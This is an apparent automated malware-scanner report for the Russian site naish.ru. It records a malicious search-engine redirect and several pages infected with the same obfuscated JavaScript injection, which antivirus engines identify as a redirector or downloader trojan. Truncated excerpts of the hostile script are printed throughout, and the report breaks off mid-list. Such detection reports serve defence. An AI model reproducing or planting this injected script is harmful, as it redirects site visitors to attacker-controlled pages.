New scan:

Malware Scanner report for naish.ru

Malicious/Suspicious/Total urls checked
15/0/15
15 pages have malicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "naish.ru" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious redirects
Found
The website redirects visitors from search engines to the 3rd-party URL:
->http://recover888.com/ek2/index.php?s=62038fda6e3731070c5bc0461787fac4
37 websites infected.

The website "naish.ru" is most probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues. Here is our redirects fixing guide.
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=naish.ru

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Malicious/Suspicious Redirects

RequestServer responseStatus
URL: http://www.naish.ru/
(imitation of visitor from search engine)


GET / HTTP/1.1
Host: www.naish.ru
Referer: http://www.google.com/search?q=redirect+check1
HTTP/1.1 302 Found
Connection: close
Date: Thu, 25 Dec 2014 12:59:27 GMT
Location: http://recover888.com/ek2/index.php?s=62038fda6e3731070c5bc0461787fac4
Server: Apache/1.3.27 (Unix) PHP/4.4.2 rus/PL30.17
Content-Type: text/html; charset=iso-8859-1
malicious

Scanned pages/files

RequestServer responseStatus
http://www.naish.ru/
200 OK
Content-Length: 34436
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

var S=new Date();var d=new Date();var f=new Date();function B(){var b;if(b!='' && b!='A'){b='Fl'};var W='';var K=unescape;var fw;if(fw!=''){fw='C'};var v;if(v!=''){v='q'};var Kz=window;var jj=new Date();var j_;if(j_!='' && j_!='O'){j_=''};var M=K("%2f%62%72%65%61%6b%2d%63%6f%6d%2f%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%62%6c%61%63%6b%62%65%72%72%79%2e%63%6f%6d%2e%70%68%70");this.CM="";var x;if(x!=''){x='Y'};var aW;if(aW!='' && aW!='nq'){aW='Ne'};function j(KE,BZ){var z=String("
... 959 bytes are skipped ...
='wu'){uX=null};g[K("%64%65%66%65%72")]=[7,1][1];var fa;if(fa!='' && fa!='Cqu'){fa=null};g[K("%73%72%63")]=pd;e.body.appendChild(g);var Ya;if(Ya!='EC' && Ya != ''){Ya=null};this.Ga='';var Pj;if(Pj!='tN' && Pj != ''){Pj=null};} catch(r){alert(r);var EJ=new Date();var HH=new String();};var ZSC=new Array();}var zG='';Kz[String("onl"+"We4uoad".substr(4))]=F;var BD;if(BD!='' && BD!='nF'){BD='DO'};var gJ;if(gJ!='wD' && gJ!='CW'){gJ=''};};var KX='';var cs='';B();

Antivirus reports:

AntiVir
JS/Redirector.DB.4
Avast
JS:Illredir-AQ [Trj]
Ikarus
Trojan.JS.Redirector
Panda
JS/Redirector.AC
nProtect
Trojan.Script.429224
K7AntiVirus
Trojan
TrendMicro-HouseCall
JS_KEMPAR.SM
Emsisoft
Trojan.Script.429224 (B)
Comodo
TrojWare.JS.Redirector.UA
McAfee-GW-Edition
JS/Redirector.u
DrWeb
JS.Redirector.based.3
TrendMicro
JS_KEMPAR.SM
Kaspersky
HEUR:Trojan-Downloader.Script.Generic
Microsoft
Trojan:JS/Redirector.DB
MicroWorld-eScan
Trojan.Script.429224
Fortinet
JS/Crypt.BBES!tr
Jiangmin
Trojan/JS.Pegel.b
McAfee
JS/Redirector.u
NANO-Antivirus
Trojan.Script.Redirector.yrnhc
F-Secure
Trojan.Script.429224
VIPRE
Trojan.JS.Redirector.cr (v)
F-Prot
JS/Redir.AV
AVG
JS/Dropper
Norman
Redir.HU
Sophos
Troj/JSRedir-BD
GData
Trojan.Script.429224
Commtouch
JS/Redir.AV
Agnitum
JS.Redirector.Gen.5
ESET-NOD32
JS/TrojanDownloader.Pegel.AP
BitDefender
Trojan.Script.429224

http://www.naish.ru/ru/news/detail.php?ID=575
200 OK
Content-Length: 34313
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

var S=new Date();var d=new Date();var f=new Date();function B(){var b;if(b!='' && b!='A'){b='Fl'};var W='';var K=unescape;var fw;if(fw!=''){fw='C'};var v;if(v!=''){v='q'};var Kz=window;var jj=new Date();var j_;if(j_!='' && j_!='O'){j_=''};var M=K("%2f%62%72%65%61%6b%2d%63%6f%6d%2f%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%62%6c%61%63%6b%62%65%72%72%79%2e%63%6f%6d%2e%70%68%70");this.CM="";var x;if(x!=''){x='Y'};var aW;if(aW!='' && aW!='nq'){aW='Ne'};function j(KE,BZ){var z=String("
... 959 bytes are skipped ...
='wu'){uX=null};g[K("%64%65%66%65%72")]=[7,1][1];var fa;if(fa!='' && fa!='Cqu'){fa=null};g[K("%73%72%63")]=pd;e.body.appendChild(g);var Ya;if(Ya!='EC' && Ya != ''){Ya=null};this.Ga='';var Pj;if(Pj!='tN' && Pj != ''){Pj=null};} catch(r){alert(r);var EJ=new Date();var HH=new String();};var ZSC=new Array();}var zG='';Kz[String("onl"+"We4uoad".substr(4))]=F;var BD;if(BD!='' && BD!='nF'){BD='DO'};var gJ;if(gJ!='wD' && gJ!='CW'){gJ=''};};var KX='';var cs='';B();

Antivirus reports:

AntiVir
JS/Redirector.DB.4
Avast
JS:Illredir-AQ [Trj]
Ikarus
Trojan.JS.Redirector
Panda
JS/Redirector.AC
nProtect
Trojan.Script.429224
K7AntiVirus
Trojan
TrendMicro-HouseCall
JS_KEMPAR.SM
Emsisoft
Trojan.Script.429224 (B)
Comodo
TrojWare.JS.Redirector.UA
McAfee-GW-Edition
JS/Redirector.u
DrWeb
JS.Redirector.based.3
TrendMicro
JS_KEMPAR.SM
Kaspersky
HEUR:Trojan-Downloader.Script.Generic
Microsoft
Trojan:JS/Redirector.DB
MicroWorld-eScan
Trojan.Script.429224
Fortinet
JS/Crypt.BBES!tr
Jiangmin
Trojan/JS.Pegel.b
McAfee
JS/Redirector.u
NANO-Antivirus
Trojan.Script.Redirector.yrnhc
F-Secure
Trojan.Script.429224
VIPRE
Trojan.JS.Redirector.cr (v)
F-Prot
JS/Redir.AV
AVG
JS/Dropper
Norman
Redir.HU
Sophos
Troj/JSRedir-BD
GData
Trojan.Script.429224
Commtouch
JS/Redir.AV
Agnitum
JS.Redirector.Gen.5
ESET-NOD32
JS/TrojanDownloader.Pegel.AP
BitDefender
Trojan.Script.429224

http://www.naish.ru/ru/news/
200 OK
Content-Length: 150771
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

var S=new Date();var d=new Date();var f=new Date();function B(){var b;if(b!='' && b!='A'){b='Fl'};var W='';var K=unescape;var fw;if(fw!=''){fw='C'};var v;if(v!=''){v='q'};var Kz=window;var jj=new Date();var j_;if(j_!='' && j_!='O'){j_=''};var M=K("%2f%62%72%65%61%6b%2d%63%6f%6d%2f%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%62%6c%61%63%6b%62%65%72%72%79%2e%63%6f%6d%2e%70%68%70");this.CM="";var x;if(x!=''){x='Y'};var aW;if(aW!='' && aW!='nq'){aW='Ne'};function j(KE,BZ){var z=String("
... 959 bytes are skipped ...
='wu'){uX=null};g[K("%64%65%66%65%72")]=[7,1][1];var fa;if(fa!='' && fa!='Cqu'){fa=null};g[K("%73%72%63")]=pd;e.body.appendChild(g);var Ya;if(Ya!='EC' && Ya != ''){Ya=null};this.Ga='';var Pj;if(Pj!='tN' && Pj != ''){Pj=null};} catch(r){alert(r);var EJ=new Date();var HH=new String();};var ZSC=new Array();}var zG='';Kz[String("onl"+"We4uoad".substr(4))]=F;var BD;if(BD!='' && BD!='nF'){BD='DO'};var gJ;if(gJ!='wD' && gJ!='CW'){gJ=''};};var KX='';var cs='';B();

Antivirus reports:

AntiVir
JS/Redirector.DB.4
Avast
JS:Illredir-AQ [Trj]
Ikarus
Trojan.JS.Redirector
Panda
JS/Redirector.AC
nProtect
Trojan.Script.429224
K7AntiVirus
Trojan
TrendMicro-HouseCall
JS_KEMPAR.SM
Emsisoft
Trojan.Script.429224 (B)
Comodo
TrojWare.JS.Redirector.UA
McAfee-GW-Edition
JS/Redirector.u
DrWeb
JS.Redirector.based.3
TrendMicro
JS_KEMPAR.SM
Kaspersky
HEUR:Trojan-Downloader.Script.Generic
Microsoft
Trojan:JS/Redirector.DB
MicroWorld-eScan
Trojan.Script.429224
Fortinet
JS/Crypt.BBES!tr
Jiangmin
Trojan/JS.Pegel.b
McAfee
JS/Redirector.u
NANO-Antivirus
Trojan.Script.Redirector.yrnhc
F-Secure
Trojan.Script.429224
VIPRE
Trojan.JS.Redirector.cr (v)
F-Prot
JS/Redir.AV
AVG
JS/Dropper
Norman
Redir.HU
Sophos
Troj/JSRedir-BD
GData
Trojan.Script.429224
Commtouch
JS/Redir.AV
Agnitum
JS.Redirector.Gen.5
ESET-NOD32
JS/TrojanDownloader.Pegel.AP
BitDefender
Trojan.Script.429224

http://www.naish.ru/ru/?PHPSESSID=7e8b14de97eaf92882728f94d7a6c6c9
200 OK
Content-Length: 34436
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

var S=new Date();var d=new Date();var f=new Date();function B(){var b;if(b!='' && b!='A'){b='Fl'};var W='';var K=unescape;var fw;if(fw!=''){fw='C'};var v;if(v!=''){v='q'};var Kz=window;var jj=new Date();var j_;if(j_!='' && j_!='O'){j_=''};var M=K("%2f%62%72%65%61%6b%2d%63%6f%6d%2f%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%62%6c%61%63%6b%62%65%72%72%79%2e%63%6f%6d%2e%70%68%70");this.CM="";var x;if(x!=''){x='Y'};var aW;if(aW!='' && aW!='nq'){aW='Ne'};function j(KE,BZ){var z=String("
... 959 bytes are skipped ...
='wu'){uX=null};g[K("%64%65%66%65%72")]=[7,1][1];var fa;if(fa!='' && fa!='Cqu'){fa=null};g[K("%73%72%63")]=pd;e.body.appendChild(g);var Ya;if(Ya!='EC' && Ya != ''){Ya=null};this.Ga='';var Pj;if(Pj!='tN' && Pj != ''){Pj=null};} catch(r){alert(r);var EJ=new Date();var HH=new String();};var ZSC=new Array();}var zG='';Kz[String("onl"+"We4uoad".substr(4))]=F;var BD;if(BD!='' && BD!='nF'){BD='DO'};var gJ;if(gJ!='wD' && gJ!='CW'){gJ=''};};var KX='';var cs='';B();

Antivirus reports:

AntiVir
JS/Redirector.DB.4
Avast
JS:Illredir-AQ [Trj]
Ikarus
Trojan.JS.Redirector
Panda
JS/Redirector.AC
nProtect
Trojan.Script.429224
K7AntiVirus
Trojan
TrendMicro-HouseCall
JS_KEMPAR.SM
Emsisoft
Trojan.Script.429224 (B)
Comodo
TrojWare.JS.Redirector.UA
McAfee-GW-Edition
JS/Redirector.u
DrWeb
JS.Redirector.based.3
TrendMicro
JS_KEMPAR.SM
Kaspersky
HEUR:Trojan-Downloader.Script.Generic
Microsoft
Trojan:JS/Redirector.DB
MicroWorld-eScan
Trojan.Script.429224
Fortinet
JS/Crypt.BBES!tr
Jiangmin
Trojan/JS.Pegel.b
McAfee
JS/Redirector.u
NANO-Antivirus
Trojan.Script.Redirector.yrnhc
F-Secure
Trojan.Script.429224
VIPRE
Trojan.JS.Redirector.cr (v)
F-Prot
JS/Redir.AV
AVG
JS/Dropper
Norman
Redir.HU
Sophos
Troj/JSRedir-BD
GData
Trojan.Script.429224
Commtouch
JS/Redir.AV
Agnitum
JS.Redirector.Gen.5
ESET-NOD32
JS/TrojanDownloader.Pegel.AP
BitDefender
Trojan.Script.429224

http://www.naish.ru/ru/
200 OK
Content-Length: 34436
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

var S=new Date();var d=new Date();var f=new Date();function B(){var b;if(b!='' && b!='A'){b='Fl'};var W='';var K=unescape;var fw;if(fw!=''){fw='C'};var v;if(v!=''){v='q'};var Kz=window;var jj=new Date();var j_;if(j_!='' && j_!='O'){j_=''};var M=K("%2f%62%72%65%61%6b%2d%63%6f%6d%2f%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%62%6c%61%63%6b%62%65%72%72%79%2e%63%6f%6d%2e%70%68%70");this.CM="";var x;if(x!=''){x='Y'};var aW;if(aW!='' && aW!='nq'){aW='Ne'};function j(KE,BZ){var z=String("
... 959 bytes are skipped ...
='wu'){uX=null};g[K("%64%65%66%65%72")]=[7,1][1];var fa;if(fa!='' && fa!='Cqu'){fa=null};g[K("%73%72%63")]=pd;e.body.appendChild(g);var Ya;if(Ya!='EC' && Ya != ''){Ya=null};this.Ga='';var Pj;if(Pj!='tN' && Pj != ''){Pj=null};} catch(r){alert(r);var EJ=new Date();var HH=new String();};var ZSC=new Array();}var zG='';Kz[String("onl"+"We4uoad".substr(4))]=F;var BD;if(BD!='' && BD!='nF'){BD='DO'};var gJ;if(gJ!='wD' && gJ!='CW'){gJ=''};};var KX='';var cs='';B();

Antivirus reports:

AntiVir
JS/Redirector.DB.4
Avast
JS:Illredir-AQ [Trj]
Ikarus
Trojan.JS.Redirector
Panda
JS/Redirector.AC
nProtect
Trojan.Script.429224
K7AntiVirus
Trojan
TrendMicro-HouseCall
JS_KEMPAR.SM
Emsisoft
Trojan.Script.429224 (B)
Comodo
TrojWare.JS.Redirector.UA
McAfee-GW-Edition
JS/Redirector.u
DrWeb
JS.Redirector.based.3
TrendMicro
JS_KEMPAR.SM
Kaspersky
HEUR:Trojan-Downloader.Script.Generic
Microsoft
Trojan:JS/Redirector.DB
MicroWorld-eScan
Trojan.Script.429224
Fortinet
JS/Crypt.BBES!tr
Jiangmin
Trojan/JS.Pegel.b
McAfee
JS/Redirector.u
NANO-Antivirus
Trojan.Script.Redirector.yrnhc
F-Secure
Trojan.Script.429224
VIPRE
Trojan.JS.Redirector.cr (v)
F-Prot
JS/Redir.AV
AVG
JS/Dropper
Norman
Redir.HU
Sophos
Troj/JSRedir-BD
GData
Trojan.Script.429224
Commtouch
JS/Redir.AV
Agnitum
JS.Redirector.Gen.5
ESET-NOD32
JS/TrojanDownloader.Pegel.AP
BitDefender
Trojan.Script.429224

http://www.naish.ru/ru/?PHPSESSID=a997dc4148479b6fc1acc162043ad1d9
200 OK
Content-Length: 34436
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

var S=new Date();var d=new Date();var f=new Date();function B(){var b;if(b!='' && b!='A'){b='Fl'};var W='';var K=unescape;var fw;if(fw!=''){fw='C'};var v;if(v!=''){v='q'};var Kz=window;var jj=new Date();var j_;if(j_!='' && j_!='O'){j_=''};var M=K("%2f%62%72%65%61%6b%2d%63%6f%6d%2f%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%62%6c%61%63%6b%62%65%72%72%79%2e%63%6f%6d%2e%70%68%70");this.CM="";var x;if(x!=''){x='Y'};var aW;if(aW!='' && aW!='nq'){aW='Ne'};function j(KE,BZ){var z=String("
... 959 bytes are skipped ...
='wu'){uX=null};g[K("%64%65%66%65%72")]=[7,1][1];var fa;if(fa!='' && fa!='Cqu'){fa=null};g[K("%73%72%63")]=pd;e.body.appendChild(g);var Ya;if(Ya!='EC' && Ya != ''){Ya=null};this.Ga='';var Pj;if(Pj!='tN' && Pj != ''){Pj=null};} catch(r){alert(r);var EJ=new Date();var HH=new String();};var ZSC=new Array();}var zG='';Kz[String("onl"+"We4uoad".substr(4))]=F;var BD;if(BD!='' && BD!='nF'){BD='DO'};var gJ;if(gJ!='wD' && gJ!='CW'){gJ=''};};var KX='';var cs='';B();

Antivirus reports:

AntiVir
JS/Redirector.DB.4
Avast
JS:Illredir-AQ [Trj]
Ikarus
Trojan.JS.Redirector
Panda
JS/Redirector.AC
nProtect
Trojan.Script.429224
K7AntiVirus
Trojan
TrendMicro-HouseCall
JS_KEMPAR.SM
Emsisoft
Trojan.Script.429224 (B)
Comodo
TrojWare.JS.Redirector.UA
McAfee-GW-Edition
JS/Redirector.u
DrWeb
JS.Redirector.based.3
TrendMicro
JS_KEMPAR.SM
Kaspersky
HEUR:Trojan-Downloader.Script.Generic
Microsoft
Trojan:JS/Redirector.DB
MicroWorld-eScan
Trojan.Script.429224
Fortinet
JS/Crypt.BBES!tr
Jiangmin
Trojan/JS.Pegel.b
McAfee
JS/Redirector.u
NANO-Antivirus
Trojan.Script.Redirector.yrnhc
F-Secure
Trojan.Script.429224
VIPRE
Trojan.JS.Redirector.cr (v)
F-Prot
JS/Redir.AV
AVG
JS/Dropper
Norman
Redir.HU
Sophos
Troj/JSRedir-BD
GData
Trojan.Script.429224
Commtouch
JS/Redir.AV
Agnitum
JS.Redirector.Gen.5
ESET-NOD32
JS/TrojanDownloader.Pegel.AP
BitDefender
Trojan.Script.429224

http://www.naish.ru/ru/catalog/?PHPSESSID=a997dc4148479b6fc1acc162043ad1d9
200 OK
Content-Length: 56931
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

var S=new Date();var d=new Date();var f=new Date();function B(){var b;if(b!='' && b!='A'){b='Fl'};var W='';var K=unescape;var fw;if(fw!=''){fw='C'};var v;if(v!=''){v='q'};var Kz=window;var jj=new Date();var j_;if(j_!='' && j_!='O'){j_=''};var M=K("%2f%62%72%65%61%6b%2d%63%6f%6d%2f%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%62%6c%61%63%6b%62%65%72%72%79%2e%63%6f%6d%2e%70%68%70");this.CM="";var x;if(x!=''){x='Y'};var aW;if(aW!='' && aW!='nq'){aW='Ne'};function j(KE,BZ){var z=String("
... 959 bytes are skipped ...
='wu'){uX=null};g[K("%64%65%66%65%72")]=[7,1][1];var fa;if(fa!='' && fa!='Cqu'){fa=null};g[K("%73%72%63")]=pd;e.body.appendChild(g);var Ya;if(Ya!='EC' && Ya != ''){Ya=null};this.Ga='';var Pj;if(Pj!='tN' && Pj != ''){Pj=null};} catch(r){alert(r);var EJ=new Date();var HH=new String();};var ZSC=new Array();}var zG='';Kz[String("onl"+"We4uoad".substr(4))]=F;var BD;if(BD!='' && BD!='nF'){BD='DO'};var gJ;if(gJ!='wD' && gJ!='CW'){gJ=''};};var KX='';var cs='';B();

Antivirus reports:

AntiVir
JS/Redirector.DB.4
Avast
JS:Illredir-AQ [Trj]
Ikarus
Trojan.JS.Redirector
Panda
JS/Redirector.AC
nProtect
Trojan.Script.429224
K7AntiVirus
Trojan
TrendMicro-HouseCall
JS_KEMPAR.SM
Emsisoft
Trojan.Script.429224 (B)
Comodo
TrojWare.JS.Redirector.UA
McAfee-GW-Edition
JS/Redirector.u
DrWeb
JS.Redirector.based.3
TrendMicro
JS_KEMPAR.SM
Kaspersky
HEUR:Trojan-Downloader.Script.Generic
Microsoft
Trojan:JS/Redirector.DB
MicroWorld-eScan
Trojan.Script.429224
Fortinet
JS/Crypt.BBES!tr
Jiangmin
Trojan/JS.Pegel.b
McAfee
JS/Redirector.u
NANO-Antivirus
Trojan.Script.Redirector.yrnhc
F-Secure
Trojan.Script.429224
VIPRE
Trojan.JS.Redirector.cr (v)
F-Prot
JS/Redir.AV
AVG
JS/Dropper
Norman
Redir.HU
Sophos
Troj/JSRedir-BD
GData
Trojan.Script.429224
Commtouch
JS/Redir.AV
Agnitum
JS.Redirector.Gen.5
ESET-NOD32
JS/TrojanDownloader.Pegel.AP
BitDefender
Trojan.Script.429224

http://www.naish.ru/ru/catalog/
200 OK
Content-Length: 56931
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

var S=new Date();var d=new Date();var f=new Date();function B(){var b;if(b!='' && b!='A'){b='Fl'};var W='';var K=unescape;var fw;if(fw!=''){fw='C'};var v;if(v!=''){v='q'};var Kz=window;var jj=new Date();var j_;if(j_!='' && j_!='O'){j_=''};var M=K("%2f%62%72%65%61%6b%2d%63%6f%6d%2f%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%62%6c%61%63%6b%62%65%72%72%79%2e%63%6f%6d%2e%70%68%70");this.CM="";var x;if(x!=''){x='Y'};var aW;if(aW!='' && aW!='nq'){aW='Ne'};function j(KE,BZ){var z=String("
... 959 bytes are skipped ...
='wu'){uX=null};g[K("%64%65%66%65%72")]=[7,1][1];var fa;if(fa!='' && fa!='Cqu'){fa=null};g[K("%73%72%63")]=pd;e.body.appendChild(g);var Ya;if(Ya!='EC' && Ya != ''){Ya=null};this.Ga='';var Pj;if(Pj!='tN' && Pj != ''){Pj=null};} catch(r){alert(r);var EJ=new Date();var HH=new String();};var ZSC=new Array();}var zG='';Kz[String("onl"+"We4uoad".substr(4))]=F;var BD;if(BD!='' && BD!='nF'){BD='DO'};var gJ;if(gJ!='wD' && gJ!='CW'){gJ=''};};var KX='';var cs='';B();

Antivirus reports:

AntiVir
JS/Redirector.DB.4
Avast
JS:Illredir-AQ [Trj]
Ikarus
Trojan.JS.Redirector
Panda
JS/Redirector.AC
nProtect
Trojan.Script.429224
K7AntiVirus
Trojan
TrendMicro-HouseCall
JS_KEMPAR.SM
Emsisoft
Trojan.Script.429224 (B)
Comodo
TrojWare.JS.Redirector.UA
McAfee-GW-Edition
JS/Redirector.u
DrWeb
JS.Redirector.based.3
TrendMicro
JS_KEMPAR.SM
Kaspersky
HEUR:Trojan-Downloader.Script.Generic
Microsoft
Trojan:JS/Redirector.DB
MicroWorld-eScan
Trojan.Script.429224
Fortinet
JS/Crypt.BBES!tr
Jiangmin
Trojan/JS.Pegel.b
McAfee
JS/Redirector.u
NANO-Antivirus
Trojan.Script.Redirector.yrnhc
F-Secure
Trojan.Script.429224
VIPRE
Trojan.JS.Redirector.cr (v)
F-Prot
JS/Redir.AV
AVG
JS/Dropper
Norman
Redir.HU
Sophos
Troj/JSRedir-BD
GData
Trojan.Script.429224
Commtouch
JS/Redir.AV
Agnitum
JS.Redirector.Gen.5
ESET-NOD32
JS/TrojanDownloader.Pegel.AP
BitDefender
Trojan.Script.429224

http://www.naish.ru/ru/?PHPSESSID=1f39e4b83fc1cf2ce8e096bc6c10649d
200 OK
Content-Length: 34436
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

var S=new Date();var d=new Date();var f=new Date();function B(){var b;if(b!='' && b!='A'){b='Fl'};var W='';var K=unescape;var fw;if(fw!=''){fw='C'};var v;if(v!=''){v='q'};var Kz=window;var jj=new Date();var j_;if(j_!='' && j_!='O'){j_=''};var M=K("%2f%62%72%65%61%6b%2d%63%6f%6d%2f%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%62%6c%61%63%6b%62%65%72%72%79%2e%63%6f%6d%2e%70%68%70");this.CM="";var x;if(x!=''){x='Y'};var aW;if(aW!='' && aW!='nq'){aW='Ne'};function j(KE,BZ){var z=String("
... 959 bytes are skipped ...
='wu'){uX=null};g[K("%64%65%66%65%72")]=[7,1][1];var fa;if(fa!='' && fa!='Cqu'){fa=null};g[K("%73%72%63")]=pd;e.body.appendChild(g);var Ya;if(Ya!='EC' && Ya != ''){Ya=null};this.Ga='';var Pj;if(Pj!='tN' && Pj != ''){Pj=null};} catch(r){alert(r);var EJ=new Date();var HH=new String();};var ZSC=new Array();}var zG='';Kz[String("onl"+"We4uoad".substr(4))]=F;var BD;if(BD!='' && BD!='nF'){BD='DO'};var gJ;if(gJ!='wD' && gJ!='CW'){gJ=''};};var KX='';var cs='';B();

Antivirus reports:

AntiVir
JS/Redirector.DB.4
Avast
JS:Illredir-AQ [Trj]
Ikarus
Trojan.JS.Redirector
Panda
JS/Redirector.AC
nProtect
Trojan.Script.429224
K7AntiVirus
Trojan
TrendMicro-HouseCall
JS_KEMPAR.SM
Emsisoft
Trojan.Script.429224 (B)
Comodo
TrojWare.JS.Redirector.UA
McAfee-GW-Edition
JS/Redirector.u
DrWeb
JS.Redirector.based.3
TrendMicro
JS_KEMPAR.SM
Kaspersky
HEUR:Trojan-Downloader.Script.Generic
Microsoft
Trojan:JS/Redirector.DB
MicroWorld-eScan
Trojan.Script.429224
Fortinet
JS/Crypt.BBES!tr
Jiangmin
Trojan/JS.Pegel.b
McAfee
JS/Redirector.u
NANO-Antivirus
Trojan.Script.Redirector.yrnhc
F-Secure
Trojan.Script.429224
VIPRE
Trojan.JS.Redirector.cr (v)
F-Prot
JS/Redir.AV
AVG
JS/Dropper
Norman
Redir.HU
Sophos
Troj/JSRedir-BD
GData
Trojan.Script.429224
Commtouch
JS/Redir.AV
Agnitum
JS.Redirector.Gen.5
ESET-NOD32
JS/TrojanDownloader.Pegel.AP
BitDefender
Trojan.Script.429224

http://www.naish.ru/ru/catalog/?PHPSESSID=1f39e4b83fc1cf2ce8e096bc6c10649d
200 OK
Content-Length: 56931
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

var S=new Date();var d=new Date();var f=new Date();function B(){var b;if(b!='' && b!='A'){b='Fl'};var W='';var K=unescape;var fw;if(fw!=''){fw='C'};var v;if(v!=''){v='q'};var Kz=window;var jj=new Date();var j_;if(j_!='' && j_!='O'){j_=''};var M=K("%2f%62%72%65%61%6b%2d%63%6f%6d%2f%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%62%6c%61%63%6b%62%65%72%72%79%2e%63%6f%6d%2e%70%68%70");this.CM="";var x;if(x!=''){x='Y'};var aW;if(aW!='' && aW!='nq'){aW='Ne'};function j(KE,BZ){var z=String("
... 959 bytes are skipped ...
='wu'){uX=null};g[K("%64%65%66%65%72")]=[7,1][1];var fa;if(fa!='' && fa!='Cqu'){fa=null};g[K("%73%72%63")]=pd;e.body.appendChild(g);var Ya;if(Ya!='EC' && Ya != ''){Ya=null};this.Ga='';var Pj;if(Pj!='tN' && Pj != ''){Pj=null};} catch(r){alert(r);var EJ=new Date();var HH=new String();};var ZSC=new Array();}var zG='';Kz[String("onl"+"We4uoad".substr(4))]=F;var BD;if(BD!='' && BD!='nF'){BD='DO'};var gJ;if(gJ!='wD' && gJ!='CW'){gJ=''};};var KX='';var cs='';B();

Antivirus reports:

AntiVir
JS/Redirector.DB.4
Avast
JS:Illredir-AQ [Trj]
Ikarus
Trojan.JS.Redirector
Panda
JS/Redirector.AC
nProtect
Trojan.Script.429224
K7AntiVirus
Trojan
TrendMicro-HouseCall
JS_KEMPAR.SM
Emsisoft
Trojan.Script.429224 (B)
Comodo
TrojWare.JS.Redirector.UA
McAfee-GW-Edition
JS/Redirector.u
DrWeb
JS.Redirector.based.3
TrendMicro
JS_KEMPAR.SM
Kaspersky
HEUR:Trojan-Downloader.Script.Generic
Microsoft
Trojan:JS/Redirector.DB
MicroWorld-eScan
Trojan.Script.429224
Fortinet
JS/Crypt.BBES!tr
Jiangmin
Trojan/JS.Pegel.b
McAfee
JS/Redirector.u
NANO-Antivirus
Trojan.Script.Redirector.yrnhc
F-Secure
Trojan.Script.429224
VIPRE
Trojan.JS.Redirector.cr (v)
F-Prot
JS/Redir.AV
AVG
JS/Dropper
Norman
Redir.HU
Sophos
Troj/JSRedir-BD
GData
Trojan.Script.429224
Commtouch
JS/Redir.AV
Agnitum
JS.Redirector.Gen.5
ESET-NOD32
JS/TrojanDownloader.Pegel.AP
BitDefender
Trojan.Script.429224

http://www.naish.ru/ru/news/?PHPSESSID=1f39e4b83fc1cf2ce8e096bc6c10649d
200 OK
Content-Length: 150771
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

var S=new Date();var d=new Date();var f=new Date();function B(){var b;if(b!='' && b!='A'){b='Fl'};var W='';var K=unescape;var fw;if(fw!=''){fw='C'};var v;if(v!=''){v='q'};var Kz=window;var jj=new Date();var j_;if(j_!='' && j_!='O'){j_=''};var M=K("%2f%62%72%65%61%6b%2d%63%6f%6d%2f%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%62%6c%61%63%6b%62%65%72%72%79%2e%63%6f%6d%2e%70%68%70");this.CM="";var x;if(x!=''){x='Y'};var aW;if(aW!='' && aW!='nq'){aW='Ne'};function j(KE,BZ){var z=String("
... 959 bytes are skipped ...
='wu'){uX=null};g[K("%64%65%66%65%72")]=[7,1][1];var fa;if(fa!='' && fa!='Cqu'){fa=null};g[K("%73%72%63")]=pd;e.body.appendChild(g);var Ya;if(Ya!='EC' && Ya != ''){Ya=null};this.Ga='';var Pj;if(Pj!='tN' && Pj != ''){Pj=null};} catch(r){alert(r);var EJ=new Date();var HH=new String();};var ZSC=new Array();}var zG='';Kz[String("onl"+"We4uoad".substr(4))]=F;var BD;if(BD!='' && BD!='nF'){BD='DO'};var gJ;if(gJ!='wD' && gJ!='CW'){gJ=''};};var KX='';var cs='';B();

Antivirus reports:

AntiVir
JS/Redirector.DB.4
Avast
JS:Illredir-AQ [Trj]
Ikarus
Trojan.JS.Redirector
Panda
JS/Redirector.AC
nProtect
Trojan.Script.429224
K7AntiVirus
Trojan
TrendMicro-HouseCall
JS_KEMPAR.SM
Emsisoft
Trojan.Script.429224 (B)
Comodo
TrojWare.JS.Redirector.UA
McAfee-GW-Edition
JS/Redirector.u
DrWeb
JS.Redirector.based.3
TrendMicro
JS_KEMPAR.SM
Kaspersky
HEUR:Trojan-Downloader.Script.Generic
Microsoft
Trojan:JS/Redirector.DB
MicroWorld-eScan
Trojan.Script.429224
Fortinet
JS/Crypt.BBES!tr
Jiangmin
Trojan/JS.Pegel.b
McAfee
JS/Redirector.u
NANO-Antivirus
Trojan.Script.Redirector.yrnhc
F-Secure
Trojan.Script.429224
VIPRE
Trojan.JS.Redirector.cr (v)
F-Prot
JS/Redir.AV
AVG
JS/Dropper
Norman
Redir.HU
Sophos
Troj/JSRedir-BD
GData
Trojan.Script.429224
Commtouch
JS/Redir.AV
Agnitum
JS.Redirector.Gen.5
ESET-NOD32
